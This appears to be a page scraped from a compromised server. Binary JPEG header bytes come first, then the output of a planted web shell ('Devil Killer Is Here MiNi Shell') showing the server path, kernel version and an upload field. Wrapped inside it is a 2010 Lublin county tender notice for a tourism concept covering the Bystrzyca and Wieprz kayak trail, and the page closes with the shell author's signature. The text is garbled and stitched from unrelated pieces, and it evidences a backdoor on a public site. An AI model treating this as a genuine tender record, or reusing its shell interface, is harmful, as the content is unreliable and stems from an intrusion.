JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/333833-N-2010.html

<p class="kh_header"><b>Lublin: PRZETARG NIEOGRANICZONY O WARTOŚCI O WARTOŚCI SZACUNKOWEJ PONIŻEJ 193 000 EURO NA  WYKONANIE ZADANIA PN. OPRACOWANIE SZCZEGÓŁOWEJ KONCEPCJI WYKORZYSTANIA SZLAKU WODNEGO BYSTRZYCY I WIEPRZA NA CELE TURYSTYCZNE.</b><br>
<b>Numer ogłoszenia: 333833 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lubelski , ul. Spokojna 9, 20-074 Lublin, woj. lubelskie, tel. 081 5326009, faks 081 5347373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY O WARTOŚCI O WARTOŚCI SZACUNKOWEJ PONIŻEJ 193 000 EURO NA  WYKONANIE ZADANIA PN. OPRACOWANIE SZCZEGÓŁOWEJ KONCEPCJI WYKORZYSTANIA SZLAKU WODNEGO BYSTRZYCY I WIEPRZA NA CELE TURYSTYCZNE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dzieła w postaci opracowania szczegółowej koncepcji wykorzystania szlaku wodnego Bystrzycy i Wieprza na cele turystyczne w ramach realizacji projektu pn. Promocja markowego produktu turystycznego Lubelszczyzny pn. Kajakiem po Bystrzycy i Wieprzu realizowanego w ramach Osi Priorytetowej VII  Kultura, turystyka i współpraca międzyregionalna, Działanie 7.2 Promocja kultury i turystyki, Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego.

2)	Celem wykonania przez Wykonawcę dzieła jest:
a)	inwentaryzacja istniejącej infrastruktury turystycznej i paraturystycznej, 
b)	określenie najważniejszych potrzeb inwestycyjnych w zakresie rozbudowy infrastruktury kajakowej 
i doprowadzenia jej do najbardziej atrakcyjnych miejsc, 
c)	zintegrowanie infrastruktury szlaku kajakowego z innymi rodzajami infrastruktury transportowej, 
d)	opracowanie planu rozwoju produktu turystycznego Kajakiem po Bystrzycy i Wieprzu, w tym:
-	przygotowanie wizualizacji multimedialnej prezentującej szlak wodny Bystrzycy i Wieprza z naniesionymi informacjami dotyczącymi atrakcji turystycznych, istniejącej infrastruktury turystycznej i paraturystycznej oraz wskazaniem punktów węzłowych,
-	opracowanie Strategii komunikacji produktu Kajakiem po Bystrzycy i Wieprzu,  Systemu Identyfikacji Wizualnej, ogólnej koncepcji graficznej kampanii promocyjnej w postaci Key Visuala oraz przygotowanie pakietu imprez towarzyszących.
3) w etapie pierwszym Wykonawca wykona następujące elementy składające się na przedmiot zamówienia:
a)	Opracowanie ogólnej koncepcji graficznej kampanii promocyjnej w postaci Key Visuala o formacie A4, zawierającej sugerowane rozwiązania graficzne lub zdjęciowe, przykłady zastosowań (co najmniej projekt ulotki oraz projekt billboardu) wraz z uzasadnieniem.
b)	System Identyfikacji Wizualnej mający celu wskazanie ściśle powiązanych ze sobą elementów, których zadaniem jest stworzenie unikatowego wizerunku produktu Kajakiem po Bystrzycy i Wieprzu.
-	SIW musi zawierać dokładną charakterystykę wszystkich elementów identyfikacji wizualnej oraz opis ich użycia, który powinien zostać opisany w tzw. Księdze Znaku, pełniącej funkcję instrukcji obsługi logo i innych elementów wizualizacji (kolorystyki, czcionki). Projekt obowiązującego logotypu projektu zostanie dostarczony przez Zamawiającego w formie zapewniającej jego wykorzystanie do planowanych działań. Ponadto, Księga Znaku powinna opisywać dokładnie budowę znaku (jego wymiary, kolorystykę, formy dopuszczalne i niedopuszczalne, zastosowane czcionki oraz przedstawione w rozbudowanej formie projekty materiałów użytkowych np. druków firmowych, kopert, grafikę strony internetowej, naklejki na segregatory itp.). 
-	W ramach systemu identyfikacji wizualnej Wykonawca zaprojektuje i opracuje: 
-	Księgę identyfikacji logotypu - szczegółowy opis budowy logotypu, logotyp w siatce modułowej, pole ochronne logotypu, minimalną wielkość logotypu, dopuszczalne tła dla logotypu, formy niedozwolonego logotypu i przykłady jego prawidłowego, jak i niepoprawnego zastosowania, stosowaną kolorystykę (podstawową i uzupełniającą dla całości materiałów), 
-	typografię - dobór typografii firmowej i użytkowej (liternictwa), 
-	projekt materiałów reklamowych m. in.: koszulki, etui na dokumenty, kubki termiczne, czapki, 
z daszkiem, latarki, płaszcze przeciwdeszczowe, bidony, wodoodporne plecaki, torby, kubki, długopis, smycz, papeterię e-mail, grafikę newslettera (elektronicznego), szablon prezentacji multimedialnej, szablon nadruku na płyty CD/DVD,
-	opis kolorów logotypu w różnych paletach kolorów (CMYK /PANTONE),
-	Wykonawca przekaże materiały w formie wydruku oraz płytę CD z cyfrowym zapisem w plikach CDR oraz JPEG zaprojektowanych elementów. 

c)	Strategia komunikacji produktu Kajakiem po Bystrzycy i Wieprzu obejmująca następujące działania:
-	określenie celów komunikacyjnych (na poziomie reklamowym),
-	identyfikacja targetów komunikacyjnych (w ujęciu mediowym),
-	Pozycjonowanie,
-	określenie USP (Unique Selling Points) markowego produktu turystycznego,
-	świat i klimat przekazu markowego produktu turystycznego,
-	dobór narzędzi i kanałów komunikacji,

d)	przeprowadzenie wizji lokalnych, zakładających wizyty w obiektach bazy turystycznej i uzupełniającej, a także w atrakcjach kulturowych i przyrodniczych, jak i infrastrukturze sportowo-rekreacyjnej na obszarze wyznaczonym przez produkt turystyczny oraz 	przeprowadzenia wywiadów indywidualnych z minimum 20 osobami zaangażowanymi w działania związane z rozwojem oferty szlaku kajakowego mające na celu wskazanie ich oczekiwań, postrzeganych szans rozwoju i barier,

4) w etapie drugim Wykonawca wykona następujące elementy składające się na przedmiot zamówienia:
a)	Plan rozwoju produktu turystycznego Kajakiem po Bystrzycy i Wieprzu, powstały w wyniku i na podstawie:
-	wizji lokalnych, zakładających wizyty w obiektach bazy turystycznej i uzupełniającej, a także w atrakcjach kulturowych i przyrodniczych, jak i infrastrukturze sportowo-rekreacyjnej na obszarze wyznaczonym przez produkt turystyczny,
-	przeprowadzenia wywiadów indywidualnych z minimum 20 osobami zaangażowanymi w działania związane z rozwojem oferty szlaku kajakowego mające na celu wskazanie ich oczekiwań, postrzeganych szans rozwoju i barier,
-	zidentyfikowania kierunków rozwoju turystycznego obszaru objętego projektem Kajakiem po Bystrzycy i Wieprzu w oparciu o audyt zasobów przyrodniczych, walorów naturalnych i antropogenicznych, kultury regionalnej, uwarunkowań historycznych, wydarzeń i atrakcji kulturowych. Kierunki opracowane mają być na podstawie zdiagnozowanego potencjału poszczególnych gmin i miasta z obszaru objętego projektem, zewnętrznych szans rozwoju i możliwości nawiązania współpracy kulturalno-turystycznej członków projektu,
-	stworzenia mapy produktowej obszaru wskazującej punkty węzłowe na szlaku (min. 8-12 obszarów),
-	przeprowadzenia minimum 3 spotkań o charakterze konsultacji społecznych, które odbędą się w Lubartowie, Rykach i Lublinie,
-	przeprowadzenie spotkania podsumowującego, na którym mają zostać omówione (z przedstawicielami samorządu, społeczności lokalnej, i przedsiębiorców z branży turystycznej) przyjęte kierunki strategiczne. Spotkanie ma się odbyć w Lublinie.
b)	Wizualizacja multimedialna prezentująca szlak wodny Bystrzycy i Wieprza.
-	Wizualizacja ma przedstawiać, w postaci mapy interaktywnej, m.in. najważniejsze zabytki, atrakcje turystyczne, miejsca odpoczynku i tzw. punkty węzłowe szlaku. Punkty węzłowe mają zostać zidentyfikowane w oparciu o wcześniej opracowany plan rozwoju produktu turystycznego Kajakiem po Bystrzycy i Wieprzu. Na mapie zostaną również wskazane miejsca, gdzie będą przeprowadzone planowane inwestycje. 
-	Każde miejsce kluczowe na szlaku zwane punktem węzłowym ma zostać pokazane przy pomocy co najmniej dwóch panoram 3600. W postaci panoram powinny zostać również pokazane atrakcje znajdujące się wzdłuż szlaku, które mają być pokazane przez dwie lub trzy panoramy 3600 oraz przykładową galerię zdjęć. Na podstawie minimum 8 wybranych (w porozumieniu z Zamawiającym) punktów węzłowych i minimum 10 atrakcji turystycznych powstać ma wirtualny spacer składający się z około 40-50 panoram 3600.
-	Panoramy powinny zostać wykonane w rozdzielczościach umożliwiających ich późniejsze wykorzystanie w drukowanych materiałach promocyjnych i informacyjnych dotyczących szlaku (takich jak broszury, foldery czy tablice informacyjne). Rozdzielczość panoram przy szerokości 1 metra powinna wynosić 300 dpi.
c)	Opracowanie i druk folderu mającego charakter oferty inwestycyjnej zawierającego prezentację potencjału gospodarczego obszaru objętego projektem Kajakiem po Bystrzycy i Wieprzu (m.in. teksty, zdjęcia, mapa obszaru) wg następującego opisu:
- format: A4, 
- nakład: 4000 sztuk, 
- gramatura papieru: okładka 250 gm2, środek 250 gm2,
- kolorystyka: okładka 4+4 , środek 4+4,
- liczba stron: 12 (8 stron + okładka),
- uszlachetnianie: folia matowa, 
- inne: zszywany.
Zawartość merytoryczna folderu:
- wstęp, 
- opis projektu,
- dokładna mapka z zaznaczonym szlakiem spływu,
- opis szlaku z uwzględnieniem punktów węzłowych oraz atrakcji turystycznych, które można zobaczyć w trakcie spływu - zakres możliwości inwestycyjnych dotyczących omawianego obszaru.
d)	Przeprowadzenie badań B2B wśród potencjalnych inwestorów, które określą kryteria brane przez przedsiębiorców pod uwagę przy wyborze lokalizacji inwestycji, wskażą postrzegane możliwości inwestycyjne w obszarze projektu Kajakiem po Bystrzycy i Wieprzu, oczekiwania co do sposobu prezentacji oferty inwestycyjnej w ramach projektu oraz postrzegane bariery inwestycyjne - Zamawiający pozostawia Wykonawcy wybór technik i metod badawczych niezbędnych do osiągnięcia celów badania, ale zakłada się, że na różnych jego etapach badanie będzie wykorzystywało co najmniej:
-	techniki ilościowe (na próbie co najmniej 300 respondentów);
-	techniki jakościowe (co najmniej 25 wywiadów).
Celami etapu badawczego jest:
-	 ustalenie oczekiwań wobec możliwości inwestycji na omawianym obszarze, 
- 	wskazanie możliwości inwestycyjnych, 
- 	określenie barier oraz oczekiwań co do możliwości inwestycyjnych,
- 	określenie oczekiwań wobec władz samorządów w zakresie wsparcia procesu inwestycyjnego, standardów informowania itp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
 -	wykonał, co najmniej jedną usługę o wartości minimum 70.000,00 złotych brutto, polegającą na wykonaniu opracowania planu rozwoju dla zintegrowanego produktu turystycznego obejmującego obszarem minimum obszar 5 gmin;
- co najmniej trzech usług, w których zrealizowano badania B2B (jakościowe dla grupy, co najmniej 10 wywiadów i ilościowe dla grupy, co najmniej 150 respondentów) o wartości 20.000,00 zł brutto każda;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin/powiatlublin/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lublinie
ul. Spokojna 9 pok. 100a
20-074 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 09:15, miejsce: Starostwo Powiatowe w Lublinie
ul. Spokojna 9 pok. 100a
20-074 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w w ramach realizacji projektu pn. Promocja markowego produktu turystycznego Lubelszczyzny pn. Kajakiem po Bystrzycy i Wieprzu realizowanego w ramach Osi Priorytetowej VII  Kultura, turystyka i współpraca międzyregionalna, Działanie 7.2 Promocja kultury i turystyki, Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com